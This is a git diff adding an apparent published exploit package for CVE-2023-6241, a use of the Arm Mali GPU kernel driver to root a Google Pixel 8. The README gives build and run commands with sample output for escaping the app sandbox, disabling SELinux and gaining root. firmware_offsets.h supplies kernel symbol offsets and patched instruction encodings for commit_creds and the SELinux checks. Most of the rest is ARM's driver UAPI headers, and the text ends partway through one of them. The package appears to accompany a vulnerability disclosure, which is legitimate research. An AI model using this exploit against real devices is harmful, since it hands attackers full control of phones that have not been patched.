diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/README.md b/SecurityExploits/Android/Mali/CVE_2023_6241/README.md new file mode 100644 index 0000000..0e37f5f --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/README.md @@ -0,0 +1,40 @@ +## Exploit for CVE-2023-6241 + +The write up can be found [here](). This is a bug in the Arm Mali kernel driver that I reported in November 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root. + +The exploit is tested on the Google Pixel 8 with the Novmember 2023 patch (`UD1A.231105.004`). It needs to be compiled with OpenCL and link with the OpenCL library `libGLES_mali.so`. The library can be found in a Pixel 8 device in `vendor/lib64/egl/libGLES_mali.so` and the OpenCL header files can be found in the KhronosGroup's [OpenCL-headers repository](https://github.com/KhronosGroup/OpenCL-Headers). The specific header that I used was the [v2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17) version, although other versions should also work. For reference, I used the following command to compile with clang in ndk-26: + +``` +android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf +``` + +The exploit needs to be linked to `libGLES_mali.so`. This can be done by setting the `LD_LIBRARY_PATH` to `/vendor/lib64/egl`. The exploit rarely fails and even if it does, it does not normally corrupt or crash the system. So in case it failed, it can be rerun. If successful, it should disable SELinux and gain root. + +``` +shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_jit_csf +mali_fd 3 +corrupted_jit_addr 6000001000 +kernel success +kernel success +queue kernel +jit_grow addr 6000001000 +Size after grow: 22f6 +Final grow size: 23c7 +keep alive jit_addr 60023d1000 +Size after free: 21fd, trim_level 6 +writing to gpu_va 6002301000 +found reused page 5fffef6000, 0 +pgd entry found at index 0 40000899bbc443 +overwrite addr : 5ffff00b50 b50 +overwrite addr : 5fffb00b50 b50 +overwrite addr : 5fff900b50 b50 +overwrite addr : 5ffff00714 714 +overwrite addr : 5fffb00714 714 +overwrite addr : 5fff900714 714 +result 50 +clean up +``` + +When running the first time, the exploit sometimes stalled after printing the last `overwrite addr` message. If that happens (stalled for more than 10 seconds, though pausing for a few seconds is normal), then simply kill the exploit and rerun it. It should not stall the second time. + +To test it with MTE enabled, follow [these instructions](https://outflux.net/blog/archives/2023/10/26/enable-mte-on-pixel-8/) to enable kernel MTE. diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h b/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h new file mode 100644 index 0000000..30f6699 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h @@ -0,0 +1,16 @@ +#ifndef FIRMWARE_OFFSETS_H +#define FIRMWARE_OFFSETS_H + +#define AVC_DENY_2311 0x806b50 + +#define SEL_READ_ENFORCE_2311 0x818714 + +#define INIT_CRED_2311 0x271bfa8 + +#define COMMIT_CREDS_2311 0x167b40 + +#define ADD_COMMIT_2311 0x912d0108 //add x8, x8, #0xb40 + +#define ADD_INIT_2311 0x913ea000 //add x0, x0, #0xfa8 + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h b/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h new file mode 100644 index 0000000..0a4172c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h @@ -0,0 +1,11 @@ +#ifndef LOG_UTILS_H +#define LOG_UTILS_H + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) +#endif + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h new file mode 100644 index 0000000..23bed51 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h @@ -0,0 +1,228 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_COMMON_KERNEL_H_ +#define _UAPI_BASE_COMMON_KERNEL_H_ + +#include +#include "mali_base_kernel.h" + +#define LOCAL_PAGE_SHIFT 12 + +#define BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS 4 + +/* Memory allocation, access/hint flags & mask. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* Special base mem handles. + */ +#define BASEP_MEM_INVALID_HANDLE (0ul) +#define BASE_MEM_MMU_DUMP_HANDLE (1ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ul << LOCAL_PAGE_SHIFT) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << LOCAL_PAGE_SHIFT) + BASE_MEM_COOKIE_BASE) + +/* Flags to pass to ::base_context_init. + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* Flags for base context */ + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Flags for base tracepoint + */ + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#endif /* _UAPI_BASE_COMMON_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h new file mode 100644 index 0000000..141b090 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h @@ -0,0 +1,608 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2023 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_CSF_KERNEL_H_ +#define _UAPI_BASE_CSF_KERNEL_H_ + +#include +#include "mali_base_common_kernel.h" + +/* Memory allocation, access/hint flags & mask specific to CSF GPU. + * + * See base_mem_alloc_flags. + */ + +/* Must be FIXED memory. */ +#define BASE_MEM_FIXED ((base_mem_alloc_flags)1 << 8) + +/* CSF event memory + * + * If Outer shareable coherence is not specified or not available, then on + * allocation kbase will automatically use the uncached GPU mapping. + * There is no need for the client to specify BASE_MEM_UNCACHED_GPU + * themselves when allocating memory with the BASE_MEM_CSF_EVENT flag. + * + * This memory requires a permanent mapping + * + * See also kbase_reg_needs_kernel_mapping() + */ +#define BASE_MEM_CSF_EVENT ((base_mem_alloc_flags)1 << 19) + +#define BASE_MEM_RESERVED_BIT_20 ((base_mem_alloc_flags)1 << 20) + + +/* Must be FIXABLE memory: its GPU VA will be determined at a later point, + * at which time it will be at a fixed GPU VA. + */ +#define BASE_MEM_FIXABLE ((base_mem_alloc_flags)1 << 29) + +/* Note that the number of bits used for base_mem_alloc_flags + * must be less than BASE_MEM_FLAGS_NR_BITS !!! + */ + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED BASE_MEM_RESERVED_BIT_20 + +/* Special base mem handles specific to CSF. + */ +#define BASEP_MEM_CSF_USER_REG_PAGE_HANDLE (47ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_CSF_USER_IO_PAGES_HANDLE (48ul << LOCAL_PAGE_SHIFT) + +#define KBASE_CSF_NUM_USER_IO_PAGES_HANDLE \ + ((BASE_MEM_COOKIE_BASE - BASEP_MEM_CSF_USER_IO_PAGES_HANDLE) >> \ + LOCAL_PAGE_SHIFT) + +/* Valid set of just-in-time memory allocation flags */ +#define BASE_JIT_ALLOC_VALID_FLAGS ((__u8)0) + +/* flags for base context specific to CSF */ + +/* Base context creates a CSF event notification thread. + * + * The creation of a CSF event notification thread is conditional but + * mandatory for the handling of CSF events. + */ +#define BASE_CONTEXT_CSF_EVENT_THREAD ((base_context_create_flags)1 << 2) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | \ + BASE_CONTEXT_CSF_EVENT_THREAD | \ + BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* Flags for base tracepoint specific to CSF */ + +/* Enable KBase tracepoints for CSF builds */ +#define BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS (1 << 2) + +/* Enable additional CSF Firmware side tracepoints */ +#define BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS (1 << 3) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED | \ + BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS | \ + BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS) + +/* Number of pages mapped into the process address space for a bound GPU + * command queue. A pair of input/output pages and a Hw doorbell page + * are mapped to enable direct submission of commands to Hw. + */ +#define BASEP_QUEUE_NR_MMAP_USER_PAGES ((size_t)3) + +#define BASE_QUEUE_MAX_PRIORITY (15U) + +/* Sync32 object fields definition */ +#define BASEP_EVENT32_VAL_OFFSET (0U) +#define BASEP_EVENT32_ERR_OFFSET (4U) +#define BASEP_EVENT32_SIZE_BYTES (8U) + +/* Sync64 object fields definition */ +#define BASEP_EVENT64_VAL_OFFSET (0U) +#define BASEP_EVENT64_ERR_OFFSET (8U) +#define BASEP_EVENT64_SIZE_BYTES (16U) + +/* Sync32 object alignment, equal to its size */ +#define BASEP_EVENT32_ALIGN_BYTES (8U) + +/* Sync64 object alignment, equal to its size */ +#define BASEP_EVENT64_ALIGN_BYTES (16U) + +/* The upper limit for number of objects that could be waited/set per command. + * This limit is now enforced as internally the error inherit inputs are + * converted to 32-bit flags in a __u32 variable occupying a previously padding + * field. + */ +#define BASEP_KCPU_CQS_MAX_NUM_OBJS ((size_t)32) + +/* CSF CSI EXCEPTION_HANDLER_FLAGS */ +#define BASE_CSF_TILER_OOM_EXCEPTION_FLAG (1u << 0) +#define BASE_CSF_EXCEPTION_HANDLER_FLAGS_MASK (BASE_CSF_TILER_OOM_EXCEPTION_FLAG) + +/** + * enum base_kcpu_command_type - Kernel CPU queue command type. + * @BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL: fence_signal, + * @BASE_KCPU_COMMAND_TYPE_FENCE_WAIT: fence_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT: cqs_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET: cqs_set, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION: cqs_wait_operation, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION: cqs_set_operation, + * @BASE_KCPU_COMMAND_TYPE_MAP_IMPORT: map_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT: unmap_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE: unmap_import_force, + * @BASE_KCPU_COMMAND_TYPE_JIT_ALLOC: jit_alloc, + * @BASE_KCPU_COMMAND_TYPE_JIT_FREE: jit_free, + * @BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND: group_suspend, + * @BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER: error_barrier, + */ +enum base_kcpu_command_type { + BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL, + BASE_KCPU_COMMAND_TYPE_FENCE_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_SET, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION, + BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION, + BASE_KCPU_COMMAND_TYPE_MAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE, + BASE_KCPU_COMMAND_TYPE_JIT_ALLOC, + BASE_KCPU_COMMAND_TYPE_JIT_FREE, + BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND, + BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER +}; + +/** + * enum base_queue_group_priority - Priority of a GPU Command Queue Group. + * @BASE_QUEUE_GROUP_PRIORITY_HIGH: GPU Command Queue Group is of high + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_MEDIUM: GPU Command Queue Group is of medium + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_LOW: GPU Command Queue Group is of low + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_REALTIME: GPU Command Queue Group is of real-time + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_COUNT: Number of GPU Command Queue Group + * priority levels. + * + * Currently this is in order of highest to lowest, but if new levels are added + * then those new levels may be out of order to preserve the ABI compatibility + * with previous releases. At that point, ensure assignment to + * the 'priority' member in &kbase_queue_group is updated to ensure it remains + * a linear ordering. + * + * There should be no gaps in the enum, otherwise use of + * BASE_QUEUE_GROUP_PRIORITY_COUNT in kbase must be updated. + */ +enum base_queue_group_priority { + BASE_QUEUE_GROUP_PRIORITY_HIGH = 0, + BASE_QUEUE_GROUP_PRIORITY_MEDIUM, + BASE_QUEUE_GROUP_PRIORITY_LOW, + BASE_QUEUE_GROUP_PRIORITY_REALTIME, + BASE_QUEUE_GROUP_PRIORITY_COUNT +}; + +struct base_kcpu_command_fence_info { + __u64 fence; +}; + +struct base_cqs_wait_info { + __u64 addr; + __u32 val; + __u32 padding; +}; + +struct base_kcpu_command_cqs_wait_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +struct base_cqs_set { + __u64 addr; +}; + +struct base_kcpu_command_cqs_set_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * typedef basep_cqs_data_type - Enumeration of CQS Data Types + * + * @BASEP_CQS_DATA_TYPE_U32: The Data Type of a CQS Object's value + * is an unsigned 32-bit integer + * @BASEP_CQS_DATA_TYPE_U64: The Data Type of a CQS Object's value + * is an unsigned 64-bit integer + */ +typedef enum PACKED { + BASEP_CQS_DATA_TYPE_U32 = 0, + BASEP_CQS_DATA_TYPE_U64 = 1, +} basep_cqs_data_type; + +/** + * typedef basep_cqs_wait_operation_op - Enumeration of CQS Object Wait + * Operation conditions + * + * @BASEP_CQS_WAIT_OPERATION_LE: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Less than or Equal to + * the Wait Operation value + * @BASEP_CQS_WAIT_OPERATION_GT: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Greater than the Wait Operation value + */ +typedef enum { + BASEP_CQS_WAIT_OPERATION_LE = 0, + BASEP_CQS_WAIT_OPERATION_GT = 1, +} basep_cqs_wait_operation_op; + +struct base_cqs_wait_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_wait_operation_info - structure which contains information + * about the Timeline CQS wait objects + * + * @objs: An array of Timeline CQS waits. + * @nr_objs: Number of Timeline CQS waits in the array. + * @inherit_err_flags: Bit-pattern for the CQSs in the array who's error field + * to be served as the source for importing into the + * queue's error-state. + */ +struct base_kcpu_command_cqs_wait_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +/** + * typedef basep_cqs_set_operation_op - Enumeration of CQS Set Operations + * + * @BASEP_CQS_SET_OPERATION_ADD: CQS Set operation for adding a value + * to a synchronization object + * @BASEP_CQS_SET_OPERATION_SET: CQS Set operation for setting the value + * of a synchronization object + */ +typedef enum { + BASEP_CQS_SET_OPERATION_ADD = 0, + BASEP_CQS_SET_OPERATION_SET = 1, +} basep_cqs_set_operation_op; + +struct base_cqs_set_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_set_operation_info - structure which contains information + * about the Timeline CQS set objects + * + * @objs: An array of Timeline CQS sets. + * @nr_objs: Number of Timeline CQS sets in the array. + * @padding: Structure padding, unused bytes. + */ +struct base_kcpu_command_cqs_set_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * struct base_kcpu_command_import_info - structure which contains information + * about the imported buffer. + * + * @handle: Address of imported user buffer. + */ +struct base_kcpu_command_import_info { + __u64 handle; +}; + +/** + * struct base_kcpu_command_jit_alloc_info - structure which contains + * information about jit memory allocation. + * + * @info: An array of elements of the + * struct base_jit_alloc_info type. + * @count: The number of elements in the info array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_alloc_info { + __u64 info; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_jit_free_info - structure which contains + * information about jit memory which is to be freed. + * + * @ids: An array containing the JIT IDs to free. + * @count: The number of elements in the ids array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_free_info { + __u64 ids; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_group_suspend_info - structure which contains + * suspend buffer data captured for a suspended queue group. + * + * @buffer: Pointer to an array of elements of the type char. + * @size: Number of elements in the @buffer array. + * @group_handle: Handle to the mapping of CSG. + * @padding: padding to a multiple of 64 bits. + */ +struct base_kcpu_command_group_suspend_info { + __u64 buffer; + __u32 size; + __u8 group_handle; + __u8 padding[3]; +}; + + +/** + * struct base_kcpu_command - kcpu command. + * @type: type of the kcpu command, one enum base_kcpu_command_type + * @padding: padding to a multiple of 64 bits + * @info: structure which contains information about the kcpu command; + * actual type is determined by @p type + * @info.fence: Fence + * @info.cqs_wait: CQS wait + * @info.cqs_set: CQS set + * @info.cqs_wait_operation: CQS wait operation + * @info.cqs_set_operation: CQS set operation + * @info.import: import + * @info.jit_alloc: JIT allocation + * @info.jit_free: JIT deallocation + * @info.suspend_buf_copy: suspend buffer copy + * @info.sample_time: sample time + * @info.padding: padding + */ +struct base_kcpu_command { + __u8 type; + __u8 padding[sizeof(__u64) - sizeof(__u8)]; + union { + struct base_kcpu_command_fence_info fence; + struct base_kcpu_command_cqs_wait_info cqs_wait; + struct base_kcpu_command_cqs_set_info cqs_set; + struct base_kcpu_command_cqs_wait_operation_info cqs_wait_operation; + struct base_kcpu_command_cqs_set_operation_info cqs_set_operation; + struct base_kcpu_command_import_info import; + struct base_kcpu_command_jit_alloc_info jit_alloc; + struct base_kcpu_command_jit_free_info jit_free; + struct base_kcpu_command_group_suspend_info suspend_buf_copy; + __u64 padding[2]; /* No sub-struct should be larger */ + } info; +}; + +/** + * struct basep_cs_stream_control - CSI capabilities. + * + * @features: Features of this stream + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_stream_control { + __u32 features; + __u32 padding; +}; + +/** + * struct basep_cs_group_control - CSG interface capabilities. + * + * @features: Features of this group + * @stream_num: Number of streams in this group + * @suspend_size: Size in bytes of the suspend buffer for this group + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_group_control { + __u32 features; + __u32 stream_num; + __u32 suspend_size; + __u32 padding; +}; + +/** + * struct base_gpu_queue_group_error_fatal_payload - Unrecoverable fault + * error information associated with GPU command queue group. + * + * @sideband: Additional information of the unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_group_error_fatal_payload { + __u64 sideband; + __u32 status; + __u32 padding; +}; + +/** + * struct base_gpu_queue_error_fatal_payload - Unrecoverable fault + * error information related to GPU command queue. + * + * @sideband: Additional information about this unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @csi_index: Index of the CSF interface the queue is bound to. + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_error_fatal_payload { + __u64 sideband; + __u32 status; + __u8 csi_index; + __u8 padding[3]; +}; + +/** + * enum base_gpu_queue_group_error_type - GPU Fatal error type. + * + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL: Fatal error associated with GPU + * command queue group. + * @BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL: Fatal error associated with GPU + * command queue. + * @BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT: Fatal error associated with + * progress timeout. + * @BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM: Fatal error due to running out + * of tiler heap memory. + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT: The number of fatal error types + * + * This type is used for &struct_base_gpu_queue_group_error.error_type. + */ +enum base_gpu_queue_group_error_type { + BASE_GPU_QUEUE_GROUP_ERROR_FATAL = 0, + BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL, + BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT, + BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM, + BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT +}; + +/** + * struct base_gpu_queue_group_error - Unrecoverable fault information + * @error_type: Error type of @base_gpu_queue_group_error_type + * indicating which field in union payload is filled + * @padding: Unused bytes for 64bit boundary + * @payload: Input Payload + * @payload.fatal_group: Unrecoverable fault error associated with + * GPU command queue group + * @payload.fatal_queue: Unrecoverable fault error associated with command queue + */ +struct base_gpu_queue_group_error { + __u8 error_type; + __u8 padding[7]; + union { + struct base_gpu_queue_group_error_fatal_payload fatal_group; + struct base_gpu_queue_error_fatal_payload fatal_queue; + } payload; +}; + +/** + * enum base_csf_notification_type - Notification type + * + * @BASE_CSF_NOTIFICATION_EVENT: Notification with kernel event + * @BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR: Notification with GPU fatal + * error + * @BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP: Notification with dumping cpu + * queue + * @BASE_CSF_NOTIFICATION_COUNT: The number of notification type + * + * This type is used for &struct_base_csf_notification.type. + */ +enum base_csf_notification_type { + BASE_CSF_NOTIFICATION_EVENT = 0, + BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR, + BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP, + BASE_CSF_NOTIFICATION_COUNT +}; + +/** + * struct base_csf_notification - Event or error notification + * + * @type: Notification type of @base_csf_notification_type + * 